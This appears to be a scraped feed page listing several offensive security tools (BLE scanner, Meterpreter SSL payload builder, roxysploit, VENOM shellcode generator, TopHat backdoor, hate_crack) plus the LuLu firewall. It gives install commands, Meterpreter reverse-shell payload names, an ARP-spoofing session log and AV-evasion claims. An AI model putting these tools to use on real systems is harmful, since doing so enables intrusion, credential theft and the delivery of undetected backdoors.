      BLEAH - A BLE Scanner For "Smart" Devices Hacking

      $
      0
      0

      A BLE scanner for "smart" devices hacking based on the bluepy library, dead easy to use because retarded devices should be dead easy to hack. Explanatory post and screenshots can be found here.

      How to Install
      Install bluepy from source:
      git clone https://github.com/IanHarvey/bluepy.git
      cd bluepy
      python setup.py build
      sudo python setup.py install
      Then install bleah:
      git clone https://github.com/evilsocket/bleah.git
      cd bleah
      python setup.py build
      sudo python setup.py install

      Usage
      From the -h help menu:
      usage: bleah [-h] [-i HCI] [-t TIMEOUT] [-s SENSITIVITY] [-b MAC] [-f] [-e] [-u UUID] [-d DATA] [-r DATAFILE]

      optional arguments:
      -h, --help show this help message and exit
      -i HCI, --hci HCI HCI device index.
      -t TIMEOUT, --timeout TIMEOUT
      Scan delay, 0 for continuous scanning.
      -s SENSITIVITY, --sensitivity SENSITIVITY
      dBm threshold.
      -b MAC, --mac MAC Filter by device address.
      -f, --force Try to connect even if the device doesn't allow to.
      -e, --enumerate Connect to available devices and perform services
      enumeration.
      -u UUID, --uuid UUID Write data to this characteristic UUID (requires --mac
      and --data).
      -d DATA, --data DATA Data to be written.
      -r DATAFILE, --datafile DATAFILE
      Read data to be written from this file.

      Examples
      Keep scanning for BTLE devices:
      sudo bleah -t0
      Connect to a specific device and enumerate all the things:
      sudo bleah -b "aa:bb:cc:dd:ee:ff" -e
      Write the bytes hello world to a specific characteristic of the device:
      sudo bleah -b "aa:bb:cc:dd:ee:ff" -u "c7d25540-31dd-11e2-81c1-0800200c9a66" -d "hello world"


      Meterpreter Paranoid Mode - Meterpreter over SSL/TLS connections

      $
      0
      0

      Meterpreter_Paranoid_Mode.sh allows users to secure your staged/stageless connection for Meterpreter by having it check the certificate of the handler it is connecting to.

      We start by generating a certificate in PEM format, once the certs have been created we can create a HTTP or HTTPS or EXE payload for it and give it the path of PEM format certificate to be used to validate the connection.

      To have the connection validated we need to tell the payload what certificate the handler will be using by setting the path to the PEM certificate in the HANDLERSSLCERT option then we enable the checking of this certificate by setting stagerverifysslcert to true.

      Once that payload is created we need to create a handler to receive the connection and again we use the PEM certificate so the handler can use the SHA1 hash for validation. Just like with the Payload we set the parameters HANDLERSSLCERT with the path to the PEM file and stagerverifysslcert to true.

      We can see the stage doing the validation when we recibe a session back ...


      Exploitation:

      Meterpreter_Paranoid_Mode tool starts posgresql service, builds the PEM certificate, builds payload (staged OR stageless), starts the comrespondent handler associated to the PEM certificate created (manual) OR impersonated (msf auxliary module) runs msf post-exploitation modules at session creation, deliver agents (staged or stageless) using hta attack vector (apache2 + hta + agent) if configurated in the settings file.

      Payloads available:
      Staged (payload.bat|ps1|txt|exe):
      windows/meterpreter/reverse_winhttps
      windows/meterpreter/reverse_https
      windows/x64/meterpreter/reverse_https

      Stageless (binary.exe):
      windows/meterpreter_reverse_https
      windows/x64/meterpreter_reverse_https

      Dependencies
      • xterm
      • zenity
      • metasploit
      • postgresql

      Limitations:
      • This tool will NOT evade AV detection, its made to prevent the data beeing transmited from client (payload) to server beeing captured (Eavesdropping)
      • If you decided to use a 64bit payload, then edit settings file and change 'MSF_ENCODER=x86/shikata_ga_nai' to one payload arch compatible encoder(64bit)
      • Only in 'staged' builds, Users are allowed to chose the extension (bat|ps1|txt|exe)

      Config Settings file (warning: case sensitive)

      msf postgresql database connection check? (msfdb reinit)


      Default payload extension (output) to use in staged builds


      Input agent (output) name manually


      Metasploit encoder to use in obfuscating payload sourcecode


      This tool will also encode the 'stage' beeing send (sending stage to 192.168.1.69:666 ..)
      using the encoder + unicode_encoder sellected on settings file (default: x86/shikata_ga_nai)



      HTA attack vector (deliver agent in local lan using apache2)


      Default msf post module to run at session creation


      Download/Install/Config:
      1° - Download framework from github
      git clone https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL.git

      2° - Set files execution permitions
      cd Meterpreter_Paranoid_Mode-SSL
      sudo chmod +x *.sh

      3° - Config tool settings
      nano settings

      4° - Run main tool
      sudo ./Meterpreter_Paranoid_Mode.sh

      Video tutorials:

      MPM [ Stageless payload - exe ]


      MPM [ Staged payload - bat ]


      MPM [ Stageless payload -exe - set encoder and post-module ]


      MPM [ Staged payload - ps1 - HTA attack vector ]



      roxysploit - Penetration Testing Suite

      $
      0
      0

      roxysploit is a community-supported, open-source and penetration testing suite that supports attacks for numerous scenarios. conducting attacks in the field.

      Some containing Plugins in roxysploit

      Scan is a automated Information gathering plugin it gives the user the ability to have a rest while the best Information gathering plugin can be executed.
      Jailpwn is a useful plugin for any iphone device that has been jailbroken it will attempt to login to the ssh using its default password giving you a full shell.
      Eternalblue is a recent plugin we added it Exploits a vulnerability on SMBv1/SMBv2 protocols these were collected from the nsa cyberweapons.
      Internalroute Exploits multiple vulnerabilities in routers this can become very useful such as hotel wifi's.
      Aurora this is a old plugin that can become very useful for pen-testers it exploits Internet Explorer 6 URL vulnerability.
      Doublepulsar is giving you the ability to Remotely inject a malicious dll backdoor into a windows computer.
      Kodi is a fantastic movie streaming platform but however it runs on linux we have Created a malicious addon(backdoor) via kodi.tv
      Bleed uses a mass vulnerability check on finding any SSL Vulnerabilities.
      Tresspass is a way of managing your php backdoor and gaining shell or even doing single commands it requires password authentication stopping any lurker.
      Handler is commonly used to create a listener on a port.
      Poppy is a mitm plugin allowing you to Arp spoof and sniff unencrypted passwords on all protocals such as ftp and http.
      Redcarpet is a nice plugin keeping you safe from malicious hackers this will Encrypt a user directory. 
      Picklock is a local bruteforce plugin that you can Picklock/bruteforce Mulitple devices Pincodes such as android usb debugging.
      Passby can load a usb to steal all credentials from a windows computer in seconds.
      Dnsspoof is common for man in the middle attacks, it can redirect any http requests to your dns.
      Smartremote this is more of a funny remote exploit you can Take over a smart tv's remote control without authentication.
      Blueborne is a recent Bluetooth memory leak all devices even cars.
      Credswipe you have to have a card reader to clone them.
      Rfpwn suitable device to bruteforce a special AM OOK or raw binary signal.
      Ftpbrute Brute-force attack an ftp(file transfer protocol) server Wifijammer you can Deauth wifi networks around your area, meaning disconnecting all users connected to the network.

      It is frequently updated
      Tested on.
      Arch LinuxWorking
      Kali LinuxWorking
      UbuntuWorking
      DebianWorking
      CentosNot Tested
      MacOSXNeeds porting
      WindowsHa no.

      How to install
      $ git clone https://github.com/Eitenne/roxysploit.git; cd roxysploit; sudo /bin/bash install

      Executing plugins examples
      rsf > use Picklock
      rsf (plugins/picklock) > help


      Core Commands
      =============

      Command Description
      ------- -----------
      help show help menu
      execute run the plugin
      exit exit the current plugin

      rsf (plugins/picklock) > execute
      [?] OS :: Select the devices os

      *0) Android :: Bruteforce 4digit pincode usb debugging
      1) Linux :: Bruteforce Encrypted partions

      [+] device: [0]:
      rsf > use Poppy
      rsf (plugins/poppy) > execute
      [?] Interface :: Your interface
      [+] interface: [wlan0]: wlp6s0
      [?] Target :: Enter the targets ip
      [+] target: [192.326.1.25]: 192.168.1.2
      [?] Gateway :: Enter the gateway/router ip
      [+] router: [192.168.1.1]:
      [?] Function :: Would you like to setup dns spoofing?

      *0) no :: Disable dns spoofing
      1) yes :: Enable dns spoofing

      [+] function: [0]:
      [?] Configuring Plugin

      Name Set Value
      ---- ----------
      Interface wlp6s0
      Target 192.168.1.2
      Router 192.168.1.1
      Plugin plugins/poppy


      [?] Execute Plugins? [yes]:
      [*] Enabling IP Forwarding...
      [*] Poisoning Targets...

      What operating systems support roxysploit?
      All Linux distros are currently supported, it is recomended for a prebuilt pentesting os like kali linux although.

      Credits
      0x5a Aaronius Witt TDHU Team(InsaneLand) @2017



      LuLu - macOS Firewall That Aims To Block Unauthorized (Outgoing) Network Traffic

      $
      0
      0

      LuLu is the free open-source macOS firewall that aims to block unauthorized (outgoing) network traffic, unless explicitly approved by the user:

      Full details and usage instructions can be found here.

      It's also important to understand LuLu's limitations! Some of these will be addressed as the software matures, while others are design decisions (mostly with the goal of keeping things simple).

          Network Monitoring
          By design, LuLu only monitors for outgoing network connections. Apple's built in firewall does a great job blocking unauthorized incoming connections.

          Rules
          Currently, LuLu only supports rules at the 'process level', meaning a process (or application) is either allowed to connect to the network or not. As is the case with other firewalls, this also means that if a legitimate (allowed) process is abused by malicious code to perform network actions, this will be allowed.

          Single User
          For now, LuLu can only be installed for a single user. Future versions will likely allow it to be installed by multiple users on the same system.

          Self-Defense
          Legitimate attackers/security professionals know that any security tool can be trivially bypassed if specifically targeted - even if the tool employs advanced self-defense mechanisms. Such self-defense mechanisms are often complex to implement and in the end, almost always futile. As such, by design LuLu (currently) implements few self-defense mechanisms. For example, an attacker could enumerate all running processes to find the LuLu component responsible for displaying alerts and terminate it (via a sigkill).

          Limited Features
          As LuLu is currently in alpha, certain features have not (yet) been implemented. For example, alert windows shown by LuLu currently only contain the ip address of the remote endpoint, not the URL. Stay tuned for updates that address these short-comings!

      To Build
      LuLu should build cleanly in Xcode (though you will have to remove code signing constraints, or replace with your own Apple developer/kernel code signing certificate).

      To Install
      For now, LuLu must be installed via the command-line. Build LuLu or download the pre-built binaries/components from the Releases page, then execute the configuration script (configure.sh) with the -install flag, as root:
      //install
      $ sudo configure.sh -install

      VENOM 1.0.15 - Metasploit Shellcode Generator/Compiler/Listener

      $
      0
      0

      The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll | msi | hta-psh ) injects the shellcode generated into one template (example: python) "the python funtion will execute the shellcode into ram" and uses compilers like gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recive the remote connection (shell or meterpreter session).

      'venom generator' tool reproduces some of the technics used by Veil-Evasion.py, unicorn.py, powersploit.py, etc, etc, etc..

      "P.S. some payloads are undetectable by AV soluctions... yes!!!" One of the reasons for that its the use of a funtion to execute the 2° stage of shell/meterpreter directly into targets ram the other reazon its the use of external obfuscator/crypters.

      HOW DO I DELIVER MY PAYLOADS TO TARGET HOST ?

      venom (malicious_server) was build to take advantage of apache2 webserver to deliver payloads (LAN) using a fake webpage writen in html that takes advantage of <iframe> <meta-http-equiv> or "<form>" tags to be hable to trigger payload downloads, the user just needs to send the link provided to target host.

      "Apache2 (malicious url) will copy all files needed to your webroot"


      DEPENDENCIES
      • Zenity
      • Metasploit
      • GCC (compiler)
      • Pyinstaller (compiler)
      • mingw32 (compiler)
      • pyherion.py (crypter)
      • wine (emulator)
      • PEScrambler.exe (PE obfuscator)
      • apache2 (webserver)| winrar (wine)
      • vbs-obfuscator (obfuscator)
      • avet (Daniel Sauder)
      • shellter (KyRecon)
      • ettercap (MitM + DNS_Spoofing)
      • encrypt_PolarSSL (AES crypter)
      "venom.sh will download/install all dependencies as they are needed"
      Adicionally was build venom-main/aux/setup.sh to help you install all venom framework dependencies (metasploit as to be manually installed).

      DOWNLOAD/INSTALL
      1° - Download framework from github
      git clone https://github.com/r00t-3xp10it/venom.git

      2° - Set files execution permitions
      cd venom-main
      sudo chmod -R +x *.sh
      sudo chmod -R +x *.py

      3° - Install dependencies
      cd aux
      sudo ./setup.sh

      4° - Run main tool
      sudo ./venom.sh

      Framework Main Menu


      [ Build 4 ] python/pyinstaller - osiris.exe

      Build 4 Work floow: Build shellcode in C language, embebbed into one python template and compiled to exe by pyinstaller = osiris.exe






      ID-entify - Search for information related to a domain (Emails, Domains, Information on WEB technology, Type of Firewall, NS and MX records)

      $
      0
      0

      ID-entify is a tool that allows you to search for information in the passive way related to a domain. Developed By Carlos Ramírez López.

      SEARCH FOR INFORMATION RELATED TO A DOMAIN:
      • Emails
      • IP addresses
      • Domains
      • Information on WEB technology
      • Type of Firewall
      • NS and MX records
      • Nmap to IP addresses and Domains.

      THE TOOLS USED IN THE INFORMATION SEARCH ARE:
      • Dnsrecon
      • Dnsenum
      • Dig
      • Blindcrawl
      • Nslookup
      • Whatweb
      • Wafw00f
      • Nmap http-waf-detect http-waf-fingerprint
      • Whois

      TO INSTALL THE TOOL:
      git clone https://github.com/BillyV4/ID-entify.git
      cd ID-entify
      chmod 777 Installer.sh
      ./Installer.sh

      TO EXECUTE THIS SCRIPT
      python /usr/share/ID-entify/ID-entify.py 

      TO EXECUTE REPORT, NMAP AND METASPLOIT
      python /usr/share/ID-entify/ID-entify-report.py


      TopHat - Fully undetected backdoor with RSA Encrypted shell

      $
      0
      0

      TopHat is a inspired by metasploits capabilties of meterpreter however i have coded a script to generate a undetected encrypted backdoor using python.

      Usage:
      python tophat.py <local host> <local port>


      Hate_Crack - Automated Hash Cracking Techniques with HashCat

      $
      0
      0

      A tool for automating cracking methodologies through Hashcat from the TrustedSec team.

      Installation
      Get the latest hashcat binaries (https://hashcat.net/hashcat/)
      OSX Install (https://www.phillips321.co.uk/2016/07/09/hashcat-on-os-x-getting-it-going/)
      mkdir -p hashcat/deps  
      git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL
      cd hashcat/
      make
      make install

      Download hate_crack
      git clone https://github.com/trustedsec/hate_crack.git
      • Customize binary and wordlist paths in "config.json"
      • Make sure that at least "rockyou.txt" is within your "wordlists" path

      Create Optimized Wordlists
      wordlist_optimizer.py - parses all wordlists from <input file list>, sorts them by length and de-duplicates into <output directory>
      usage: python wordlist_optimizer.py <input file list> <output directory>
      $ python wordlist_optimizer.py wordlists.txt ../optimized_wordlists

      Usage
      $ ./hate_crack.py usage: python hate_crack.py <hash_file> <hash_type>
      The <hash_type> is attained by running hashcat --help
      Example Hashes: http://hashcat.net/wiki/doku.php?id=example_hashes
      $ hashcat --help |grep -i ntlm
      5500 | NetNTLMv1 | Network protocols
      5500 | NetNTLMv1 + ESS | Network protocols
      5600 | NetNTLMv2 | Network protocols
      1000 | NTLM | Operating-Systems

      $ ./hate_crack.py  1000

      ___ ___ __ _________ __
      / | \_____ _/ |_ ____ \_ ___ \____________ ____ | | __
      / ~ \__ \\ __\/ __ \ / \ \/\_ __ \__ \ _/ ___\| |/ /
      \ Y // __ \| | \ ___/ \ \____| | \// __ \\ \___| <
      \___|_ /(____ /__| \___ >____\______ /|__| (____ /\___ >__|_ \
      \/ \/ \/_____/ \/ \/ \/ \/
      Public Release
      Version 1.00


      (1) Quick Crack
      (2) Extensive Pure_Hate Methodology Crack
      (3) Brute Force Attack
      (4) Top Mask Attack
      (5) Fingerprint Attack
      (6) Combinator Attack
      (7) Hybrid Attack
      (8) Pathwell Top 100 Mask Brute Force Crack
      (9) PRINCE Attack
      (10) YOLO Combinator Attack

      (97) Display Cracked Hashes
      (98) Display README
      (99) Quit

      Select a task:

      Quick Crack
      • Runs a dictionary attack using all wordlists configured in your "hcatOptimizedWordlists" path and applies the "best64.rule", with the option of chaining the "best64.rule".

      Extensive Pure_Hate Methodology Crack
      Runs several attack methods provided by Martin Bos (formerly known as pure_hate)
      • Brute Force Attack (7 characters)
      • Dictionary Attack
        • All wordlists in "hcatOptimizedWordlists" with "best64.rule"
        • wordlists/rockyou.txt with "d3ad0ne.rule"
        • wordlists/rockyou.txt with "T0XlC.rule"
      • Top Mask Attack (Target Time = 4 Hours)
      • Fingerprint Attack
      • Combinator Attack
      • Hybrid Attack
      • Extra - Just For Good Measure
        • Runs a dictionary attack using wordlists/rockyou.txt with chained "combinator.rule" and "InsidePro-PasswordsPro.rule" rules

      Brute Force Attack
      Brute forces all characters with the choice of a minimum and maximum password length.

      Top Mask Attack
      Uses StatsGen and MaskGen from PACK (https://thesprawl.org/projects/pack/) to perform a top mask attack using passwords already cracked for the current session. Presents the user a choice of target cracking time to spend (default 4 hours).

      Fingerprint Attack
      https://hashcat.net/wiki/doku.php?id=fingerprint_attack
      Runs a fingerprint attack using passwords already cracked for the current session.

      Combinator Attack
      https://hashcat.net/wiki/doku.php?id=combinator_attack
      Runs a combinator attack using the "rockyou.txt" wordlist.

      Hybrid Attack
      https://hashcat.net/wiki/doku.php?id=hybrid_attack
      • Runs several hybrid attacks using the "rockyou.txt" wordlists.
        • Hybrid Wordlist + Mask - ?s?d wordlists/rockyou.txt ?1?1
        • Hybrid Wordlist + Mask - ?s?d wordlists/rockyou.txt ?1?1?1
        • Hybrid Wordlist + Mask - ?s?d wordlists/rockyou.txt ?1?1?1?1
        • Hybrid Mask + Wordlist - ?s?d ?1?1 wordlists/rockyou.txt
        • Hybrid Mask + Wordlist - ?s?d ?1?1?1 wordlists/rockyou.txt
        • Hybrid Mask + Wordlist - ?s?d ?1?1?1?1 wordlists/rockyou.txt

      Pathwell Top 100 Mask Brute Force Crack
      Runs a brute force attack using the top 100 masks from KoreLogic: https://blog.korelogic.com/blog/2014/04/04/pathwell_topologies

      PRINCE Attack
      https://hashcat.net/events/p14-trondheim/prince-attack.pdf
      Runs a PRINCE attack using wordlists/rockyou.txt

      YOLO Combinator Attack
      Runs a continuous combinator attack using random wordlists from the optimized wordlists for the left and right sides.


      Viewing all 5854 articles
      Browse latest View live


      <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>